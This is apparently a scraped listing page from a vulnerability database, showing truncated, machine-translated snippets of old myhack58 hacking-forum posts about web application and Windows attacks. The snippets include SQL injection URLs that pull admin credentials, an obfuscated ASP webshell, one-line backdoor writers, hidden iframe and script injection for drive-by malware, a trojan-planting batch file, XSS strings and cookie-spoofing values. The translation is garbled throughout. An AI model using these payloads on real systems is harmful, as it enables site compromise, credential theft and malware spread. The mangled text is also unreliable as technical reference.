Lucene search
K
Myhack58Most viewed

7620 matches found

myhack58
myhack58
added 2010/10/04 12:0 a.m.18 views

ecshop modify any user password vulnerability XSS exploit-vulnerability warning-the black bar safety net

Currently ecshop presence of the reflection typeXSS, you can use, if the secondary development existXSSor other CSRF problem, then use more. Once encountered this problem, slightly affected by its damage) ByXSSstructure post submission of personal information is modified, the modification is...

0.1AI score
Exploits0
myhack58
myhack58
added 2010/09/18 12:0 a.m.18 views

Phpcms2008 local file inclusion vulnerabilities and using: an arbitrary SQL statement execution-vulnerability warning-the black bar safety net

Author: oldjun Recently been made an afterthought, so be despised; but there's no way to make the head of the bird is also people laughing at you! Anyway, these things throw me here also no use, will only rot in the hard disk! Thus, as long as a little wind blows grass move, I'll publish it. The...

0.7AI score
Exploits0
myhack58
myhack58
added 2010/07/17 12:0 a.m.18 views

Struts2/XWork < 2.2.0 remote execution of arbitrary code vulnerability analysis and patch-vulnerability warning-the black bar safety net

Neeao's Blog http://neeao.com/ : 1. exploit-db website on 7 month 1 4 day broke aStruts2 remote execution of arbitrary code vulnerabilityvulnerability, hazard of large, can be described as a crack shot, directly to the root, as long as the use Struts2 and webwork framework of the system for the...

0.7AI score
Exploits0
myhack58
myhack58
added 2010/06/21 12:0 a.m.19 views

Pico overseas game currency leveling system 0day-vulnerability warning-the black bar safety net

漏洞 文件 :index.php code......) hhadmin/up.php an arbitrary upload vulnerability Default background address:hhadmin exp http://hack58.com/index.php?mainpage=buyitems&gid=-10 union select 1,adminname from yuadmin/qing http://hack58.com/index.php?mainpage=buyitems&gid=-10 union select 1,adminpwd from...

0.8AI score
Exploits0
myhack58
myhack58
added 2010/06/17 12:0 a.m.18 views

DDLCMS v2. 1 Remote File inclusion vulnerability-vulnerability warning-the black bar safety net

DDLCMS v2. 1 program thanks. php page there is a remote file inclusion vulnerability Vulnerability file:thanks.php Code: includeWWWROOT . 'skins/' . $skin . '/header.php'; // line 46 includeWWWROOT . 'leftside.php'; Poc: the"skin" parameter in FILE thanks.php is not Defined which can allow remote...

2.8AI score
Exploits0
myhack58
myhack58
added 2010/05/07 12:0 a.m.18 views

phpcms 2 0 0 8 yp.php 0day exp-vulnerability warning-the black bar safety net

? php iniset“maxexecutiontime”,0; errorreporting7; function usage global $argv; exit “\n–+++============================================================+++–”. “\n–+++====== PhpCms 2 0 0 8 Sp3 Blind SQL Injection Exploit========+++–”...

Exploits0
myhack58
myhack58
added 2010/04/26 12:0 a.m.18 views

SHOPXP online shopping system v10. 3 1 injection vulnerability Exp-vulnerability warning-the black bar safety net

Limitations is very big, also is the background a file didn't do the filter. So yeah, a lot of stations changed the background, so is useless. EXP: !-- ShopXpOday -- !-- inurl:xpCatalogxpDesc. asp? actionkeyorder= Or inurl:shopxpnews. asp - form action="" method="post" label div align="left"ShopX...

7.2AI score
Exploits0
myhack58
myhack58
added 2010/04/20 12:0 a.m.18 views

Simple forged X-Forwarded-For-bug warning-the black bar safety net

On the forged X-Forwarded-For purposes I will not say more. In the invasion of a PHP station, the GPC is ON, Character type injection all., while in PHP5, the GPC the default is open. But GPC for$SERVER without any effect, So you can fake the$SERVER to achieve the injection to the purpose. IP. in...

7.5AI score
Exploits0
myhack58
myhack58
added 2010/04/19 12:0 a.m.18 views

FreeBSD 6.4 root shell exploit 0 day-vulnerability warning-the black bar safety net

The following code exploit the vulnerability to run in kernel-mode code if 0 FreeBSD 6.4 and below are vulnerable to race condition between pipeclose and knlistcleardel resulting in NULL pointer dereference. The following code exploits the vulnerability to run code in kernel mode, giving root she...

0.2AI score
Exploits0
myhack58
myhack58
added 2010/04/15 12:0 a.m.18 views

Le tour travel site management system v1. 7. 3 xday-vulnerability warning-the black bar safety net

The exploit procedure: First: The administrator directory under AdminPassod. asp !-- include file="../Include/conn. asp" - !-- include file="../Include/md5. asp" - % select case request. QueryString"Action" case "ModifyPass" SaveNewPass case else end select set rs = server. createobject"adodb...

Exploits0
myhack58
myhack58
added 2010/04/01 12:0 a.m.18 views

Hidden WEBSHELL-vulnerability warning-the black bar safety net

%if request. QueryString"hac"="ker" then a=Request. TotalBytes:if a Then b="adodb. stream":Set c=Createobjectb:c. Type=1:c. Open:c. The Write Request. BinaryReada:c. Position=0:d=c. Read:e=chrB1 3&chrB 1 0:f=Instrbd,e:g=Instrbf+1,d,e:set h=Createobjectb:h. Type=1:h. Open:c. Position=f+1:c. Copyto...

0.8AI score
Exploits0
myhack58
myhack58
added 2010/03/25 12:0 a.m.18 views

Discuz! NT3. 0 background to get shell-vulnerability warning-the black bar safety net

Author: icysun Himself not to engage in a good long time to figure out how to get the shell Into the back we can know that the website path, this is important Direct export word Select from table1 into outfile 'c:\test.txt' this is no good, don't know where I wrong, or is simply not on. So we can...

1.4AI score
Exploits0
myhack58
myhack58
added 2010/03/12 12:0 a.m.18 views

Zoomla! By the waves of CMS3. 2 0day-vulnerability warning-the black bar safety net

Zoomla! By wave CMS is a powerful website, the kernel and management system,integrated content management\OA\SNS\project\capture\mail subscriptions, and other powerful functions,based on the clanguage. net architecture development,is currently the only sync support MSSQL and Oracle, two large...

Exploits0
myhack58
myhack58
added 2010/03/04 12:0 a.m.18 views

Sablog-X 2.0 COOKIE spoofing exploit-vulnerability warning-the black bar safety net

Vulnerability file: cp.php Specific code, please see the text behind Cheat cookie: saxauth=MQkJ;saxhash=abcdef; Get the webshell methods: Template Manager-edit template-tag list-write a sentence ! The Trojan path http://url/templates/default/tag.php the word connection end cp. php vulnerability...

0.3AI score
Exploits0
myhack58
myhack58
added 2010/03/03 12:0 a.m.18 views

UCHOME1. 5 XSS vulnerability-vulnerability warning-the black bar safety net

-------------space.php------------- Test code: you need to first login http://u.discuz.net//home//space.php?scriptalert/hiphop//script/script...

7.2AI score
Exploits0
myhack58
myhack58
added 2010/02/26 12:0 a.m.18 views

In ASP the database insert webshell small conference-vulnerability warning-the black bar safety net

Some time ago, the new cloud management system, dynamic network Forum get a WEBSHELL and this, today, we discuss this aspect of things, in fact, ASP database plug horse also is not what fresh stuff, believe you played this. Oh, and that you have not met insert the asp code is spaces apart case?...

7.2AI score
Exploits0
myhack58
myhack58
added 2010/02/25 12:0 a.m.18 views

SAblog background permission spoofing vulnerability simple use method-vulnerability warning-the black bar safety net

Vulnerability analysis article: We may not use this POC, then we get SABlog official test! As far as I know SAblog the author is Security angels of the Creator! First of all open our Guilin veteran developed cookie cheat tool! Given POC GET /cp.php HTTP/1.1; Host: 127.0.0.1 Connection: Close...

7.2AI score
Exploits0
myhack58
myhack58
added 2010/01/29 12:0 a.m.18 views

mobile9 local file inclusion vulnerability-vulnerability warning-the black bar safety net

Because he is the base64 encoding of the manual testing is very troublesome just wrote a small tool,master drifting import urllib2,sys import httplib import base64,time if lensys. argv = 2: print "=" 3 0 print "mobile9.com local exploit by cnb|rd Qq:4 4 1 3 0 3 2 2 8" print...

0.6AI score
Exploits0
myhack58
myhack58
added 2010/01/19 12:0 a.m.18 views

Network fun online shopping system fashion version v9. 7 background to really get the shell-vulnerability warning-the black bar safety net

Under the latest 2 0 0 9-1 2-2 2 just came out of the see online are only injected, no real take the shell on! The study of the following Web fun contains Forum, the forum for YXBBS it! YxBBs 2.3 For Access version! yxbbs the original Station data on the backup is there, and the fun is removed! S...

7.5AI score
Exploits0
myhack58
myhack58
added 2010/01/18 12:0 a.m.18 views

cuteeditor using the method of two-vulnerability and early warning-the black bar safety net

Author: m@w01f 1. Direct Download load. ashx configuration file http://www.7747.net/CuteSoftClie ... ../../../web. config Then view some of the sql configuration information from the sql database connection to start with connectionStrings add name="ynncConnectionString" connectionString="Server=....

7AI score
Exploits0
myhack58
myhack58
added 2010/01/17 12:0 a.m.18 views

DECT cordless telephone security test-use-vulnerability warning-the black bar safety net

Disclaimer: This article tests the use of the DECT phone are has himself, strongly opposed any who used to be discord, or even break the law.! Just use the "hack DECT cordless phone" as keyword Google the following. Found this 2 articles: hack crack DECT cordless telephone security system...

6.7AI score
Exploits0
myhack58
myhack58
added 2010/01/13 12:0 a.m.18 views

On plesk virtual host to mention the right-vulnerability warning-the black bar safety net

This virtual machine in a foreign country relatively popular. Safety performance is also very high, where the next record to mention the right methods. 1. mysql adminthe original rootand the default passwordsetupdidn't change,by mysql to provide the right 2. Parallels Plesk Control Panel,in 8 8 8...

0.3AI score
Exploits0
myhack58
myhack58
added 2010/01/13 12:0 a.m.18 views

The corporate website is black universal vulnerability-the vulnerability warning-the black bar safety net

The corporate website is black universal vulnerability Webmasters runaway revenge only in this document to each enterprise network administrator, I hope for your help - The runaway revenge 1, The default account and password General network company for the enterprises to do the website or the...

0.4AI score
Exploits0
myhack58
myhack58
added 2010/01/06 12:0 a.m.18 views

PcAnyWhere connection on after the black screen issue-bug warning-the black bar safety net

The reason is the previous even people not normally disconnected. In this case first use the PCANYWHERE connection on, although can't see the screen, but other management operations can still be done. In the master-end management inside look at the process 找到 awhost32.exe end off. Then re-connect...

1.9AI score
Exploits0
myhack58
myhack58
added 2009/12/31 12:0 a.m.18 views

Clever built back door method a-vulnerability warning-the black bar safety net

Clever opened the back door a, the beginning: Prepared items: The disposable back-door one! The batch file one! A precondition,the other side has to open the terminal The batch file content ====================== echo Code By N/P copy 木马 .exe %windir%\system32\dllcache\magnify.exe /y the move 木马...

0.8AI score
Exploits0
myhack58
myhack58
added 2009/12/30 12:0 a.m.18 views

php168 v6. 0 vulnerability-vulnerability warning-the black bar safety net

php168 v6. 0 vulnerability description: The two-step first do/jsarticle. php file if! eregi"^hot|com|new|lastview|like|pic$",$type die"Type Error"; $FileName=dirnameFILE."/../ cache/jsarticlecache/"; if$type==’like’ $FileName.= floor$id/3 0 0 0."/"; else unset$id; $FileName.=" $type$fid$id. php";...

7.1AI score
Exploits0
myhack58
myhack58
added 2009/12/24 12:0 a.m.18 views

Crack 4 0 bit MD5 encryption-vulnerability warning-the black bar safety net

General site background administrator password is MD5 encrypted, pretty much everything is a 1 6-bit and 3 2-bit, If the first encounter 4 0 bit encryption, but also really reflect, however, are in fact the same. 7a57a5a743894a0e4a801fc343894a0e4a801fc3 the original is admin This actually MD5...

7.1AI score
Exploits0
myhack58
myhack58
added 2009/12/21 12:0 a.m.18 views

dedecms latest injection vulnerability-vulnerability warning-the black bar safety net

dedecms5. 3 and 5. The 5-Series version, there is a major injection vulnerability, Author:Zhang Heng Suppose domain name is:www. abc. com attack steps are as follows: 1. Visit the URL: http://www.abc.com/plus/diggframe.php?action=good&id=1 0 2 4% 6 5 1 0 2 4&mid=/eval$POSTx;vardump3;?& gt; 2...

7.7AI score
Exploits0
myhack58
myhack58
added 2009/12/15 12:0 a.m.18 views

For Fckeditor some vulnerability summary-vulnerability warning-the black bar safety net

For Fckeditor some vulnerability summary of course this is all online disclosed.... This time he concluded it out..put the blog on hope to help everyone Fckeditor version and more..support many languages..so this is not for any version or language. Speak only using the method...

7.1AI score
Exploits0
myhack58
myhack58
added 2009/12/13 12:0 a.m.18 views

Permission to use the highest system of accounts-vulnerability warning-the black bar safety net

One, at the command line to end the explorer process taskkill /f /im explorer.exe Second, the plan task start an interactive interface at 1 3:3 0 /interactive explorer.exe You must open the Task Scheduler service, the default is open. So when the 1 3:3 0 when the explorer process to the system us...

0.8AI score
Exploits0
myhack58
myhack58
added 2009/12/07 12:0 a.m.18 views

1 0 kind of hung it to the way-vulnerability warning-the black bar safety net

A:The frame hanging horse iframe src=address width=0 height=0/iframe II:the js file hanging horse First, the following code document. write"iframe width='0' height='0' src='address'/iframe"; 保存 为 xxx.js that The JS hung it to the code script language=javascript src=xxx. js/script Three:js...

7.3AI score
Exploits0
myhack58
myhack58
added 2009/11/24 12:0 a.m.18 views

Joomla! sql injection vulnerability-vulnerability warning-the black bar safety net

Joomla! the iF Portfolio Nexus Component ’id’ sql injection vulnerability The following example URIs are available: http://www.example.com/services/portfolio?view=item&;id=-100%20union%20all%20select%2 0 1,version%2 8%29,3,4,5,6,7,...

1.6AI score
Exploits0
myhack58
myhack58
added 2009/11/24 12:0 a.m.18 views

Meters topology information background upload vulnerability(Bincker)-vulnerability warning-the black bar safety net

Vulnerability description: See background upload page h t t p : / /localhost/admin/include/uploadfile.php ? php requireonce '../login/logincheck.php'; $cssurl="../templates/".$ metskin."/ css"; $imgurl="../templates/".$ metskin."/ images"; ?& gt; html head meta http-equiv="Content-Type"...

6.9AI score
Exploits0
myhack58
myhack58
added 2009/10/22 12:0 a.m.18 views

Master of advanced clever change settings enhanced 3 3 8 9 intrusion-vulnerability warning-the black bar safety net

Many of my friends using the input by 3 3 8 9 port someone else's Server, be found in connection to the other machine, not like the network computer that can pass each file, which to a large extent, so that after the attack greatly reduced, in fact, hit on Microsoft's own“patch”can fix this...

0.3AI score
Exploits0
myhack58
myhack58
added 2009/10/12 12:0 a.m.18 views

DEDECMS 5.1 feedback_js.php 0DAY-vulnerability warning-the black bar safety net

Author:st0p&Rainy'Fox The same is on magicquotesgpc=off case available Vulnerability version:DEDECMS 5.1 This vulnerability can get to the backend Administrator's account and the encrypted HASH,漏洞 存在 文件 plus/feedbackjs.php,not a Filter parameter for$arcurl ...... $urlindex = 0; ifempty$arcID $row...

7.9AI score
Exploits0
myhack58
myhack58
added 2009/10/01 12:0 a.m.18 views

union select control ewebeditor Upload File suffix-vulnerability warning-the black bar safety net

Form:dark group technology Forum union select control ewebeditor Upload File suffix2.16 Currently circulating online too much ewebeidtor a modified version of the lite version 2 1 6 version of ewebeditor the presence of an injection vulnerabilities after a version also exists such a problem Some...

7.7AI score
Exploits0
myhack58
myhack58
added 2009/09/26 12:0 a.m.18 views

Side note the Echo of the target Station WebShell-vulnerability warning-the black bar safety net

Command format The Echo statement the target Station absolute directory For example: echo ^^%execute request"0"^%^ D:\03389.com\wwwroot\YingMu.asp Such access to the target bin directory it will generate a password of 0 the asp in a word, this method in PHP and other scripting languages are...

1.5AI score
Exploits0
myhack58
myhack58
added 2009/09/24 12:0 a.m.18 views

Stream 0day principles+practice-vulnerability warning-the black bar safety net

-gxm &ãƒÿ Kiba メ Kaka B. S. T&EEST First of all as I am, gxm, very pleased with Kaka in the 2 Number 3 of the morning 2am more common study of the flow of data in this subject. Thanks Kaka selfless dedication. Technology sharing. Only allow this stream to fully play his strength. A principle Firs...

7.4AI score
Exploits0
myhack58
myhack58
added 2009/09/19 12:0 a.m.18 views

A simple analysis of an upload vulnerability in the file+patch(Greiner Windows upload program v1. 0)-bug warning-the black bar safety net

That would be boring brain fever turned out to go get a XX Stationdon't think crooked they would have been the dish I find Ah find Ah, finally found an upload vulnerability Impatient to run the Toolbox to find put got moldy pony uh yeah, just Upload a pony Oh after uploading there is a file type...

7.7AI score
Exploits0
myhack58
myhack58
added 2009/09/13 12:0 a.m.18 views

KesionCMS(section news)upload vulnerability-vulnerability warning-the black bar safety net

Prius special A bit tasteless,with a few days before the publication of the iis6 filename parsing vulnerability achieve to obtain webshell. First find the use of tech-ex systems site,registered members,and then input KSeditor/selectupfiles. asp, Open after upload x. asp;x. jpg format image file,i...

1.5AI score
Exploits0
myhack58
myhack58
added 2009/07/30 12:0 a.m.18 views

Joomla! HTTP header cross-site scripting vulnerability-vulnerability warning-the black bar safety net

From the green Alliance:no commercial use indicate in advance Joomla! Is an open source content management system CMS to. Joomla! Not properly filter the user in the HTTP request the the submission of the HTTPREFERER variable, a remote attacker can submit a malicious request to inject JavaScript ...

0.6AI score
Exploits0
myhack58
myhack58
added 2009/07/19 12:0 a.m.18 views

Open 3 3 8 9 unable to login the 5 types of reasons-vulnerability warning-the black bar safety net

1, The server in the internal network. 2, the tcp/ip filtering. First execute the following cmd command: cmd /c regedit-e c:\1.reg HKEYLOCALMACHINE\SYSTEM\ControlSet001\Services\Tcpip export the registry concerning the TCP/IP filtering in the first place cmd /c regedit-e c:\2.reg...

2.3AI score
Exploits0
myhack58
myhack58
added 2009/07/18 12:0 a.m.18 views

phpWebThings <= 1.5.2 MD5 Hash recovery/file disclosure remote vulnerabilities-vulnerability warning-the black bar safety net

phpWebThings = 1.5.2 MD5 Hash recovery/file disclosure remote vulnerabilities Note: 1, regardless of the php. ini how to set this vulnerability are effective; 2, The wtconfig.php contains the mysql login Brief description: phpWebThings including one that allows an attacker to executeSQL...

8.2AI score
Exploits0
myhack58
myhack58
added 2009/05/28 12:0 a.m.18 views

DMXReady Registration Manager 1.1 0day-vulnerability warning-the black bar safety net

Play first before watching this because this travertine according to this hole again to dig - in! http://www.milw0rm.com/exploits/8705 GoogleHack inurl:incwebblogmanager. asp Then browse/includes/sharedscripts/wysiwygeditor/assetmanager/assetmanager. asp Create a new xxx. asp directory the back...

7AI score
Exploits0
myhack58
myhack58
added 2009/05/15 12:0 a.m.18 views

To quickly locate website source code-bug warning-the black bar safety net

In practice we often face such a dilemma: we felt that the target site uses a set of open source code, but by the webmasters of the pages of the modified obliterate the ability to directly access this source The name of the dominant logo. This our hack is obviously unfavorable, we may in order to...

6.8AI score
Exploits0
myhack58
myhack58
added 2009/05/11 12:0 a.m.18 views

Build mysql remote connection for the root user permissions-bug warning-the black bar safety net

The following statement has the ROOT user the same permissions. Everyone in the holding station should come across. the root user of mysql, you can only locally connected, the external refuse the connection. The following methods can help you solve this problem, the following statements function...

0.9AI score
Exploits0
myhack58
myhack58
added 2009/05/02 12:0 a.m.18 views

flashfxp without any tools to view the password-vulnerability warning-the black bar safety net

Method: Click“Site”-“site Manager”, and then in the Quick Connect or the following list of sites at the right-click the site name, and then select“Copy to clipboard”then it will pop up a“whether to copy the user name and password”, click that, then paste it into the Notepad inside is plain text...

1.2AI score
Exploits0
myhack58
myhack58
added 2009/04/14 12:0 a.m.18 views

Dust on the network enterprise websites intelligent management system 0day to use the program-vulnerability warning-the black bar safety net

Vulnerability report: Google keywords:inurl:/Web-GuestView. asp Test method: ,username,password,4,5,6,7,8%20fr%6Fm%20admin...

7.2AI score
Exploits0
myhack58
myhack58
added 2009/04/04 12:0 a.m.18 views

Make someone's broiler to take the initiative to find you-vulnerability warning-the black bar safety net

Make someone's broiler to take the initiative to find you.·· A looking for a broiler of simple method First, you need a little something nc.exe the. What something?! Al quack, I don't know, yourself and slowly the search engine inside looking for that you think is what's what sprinkle. Then edit...

7.1AI score
Exploits0
myhack58
myhack58
added 2009/04/03 12:0 a.m.18 views

metasploit autopwn with mysql simple Edition-vulnerability warning-the black bar safety net

Author: Sh@dow Before according to the foreign method, although able to successfully run the autopwn,but set up ash is often in trouble right now according to their own summary of the simple method, stick out a detailed set up steps. First, we find creating a data table of the sql file...

7.5AI score
Exploits0
Total number of security vulnerabilities5000